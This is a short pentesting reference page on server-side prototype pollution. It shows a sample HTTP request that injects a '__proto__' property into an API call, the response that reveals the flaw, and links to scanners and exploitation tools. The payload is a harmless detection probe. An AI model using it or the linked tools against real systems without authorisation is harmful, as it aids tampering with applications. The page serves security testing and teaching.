Prototype Pollution

Detection

How to exploit an API using prototype pollutionDana Epp's Blog

POST /api/user HTTP/1.1
Host: vuln-api.com
...
{
     "user":"bob",
     "firstName":"Bob",
     "lastName":"Smith",
     "__proto__":{
          "foo":"bar"
     }
}

If the target is vulnerable to SSPP, then you may see a new property called foo with the value of bar reflected in the response:

HTTP/1.1 200 OK
...
{
     "username":"bob",
     "firstName":"Bob",
     "lastName":"Smith",
     "foo":"bar"
}

Tools

GitHub - edoardottt/pphack: The Most Advanced Client-Side Prototype Pollution ScannerGitHub

GitHub - kleiton0x00/ppmap: A scanner/exploitation tool written in GO, which leverages client-side Prototype Pollution to XSS by exploiting known gadgets.GitHub

GitHub - dwisiswant0/ppfuzz: A fast tool to scan client-side prototype pollution vulnerability written in Rust. 🦀GitHub

GitHub - raverrr/plution: Prototype pollution scanner using headless chromeGitHub

Resources

Prototype pollution : exploitations et mesures de sécuritéVAADATA - Ethical Hacking Services

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousJSON Attack NextWeb Mass Assignment

Last updated 1 month ago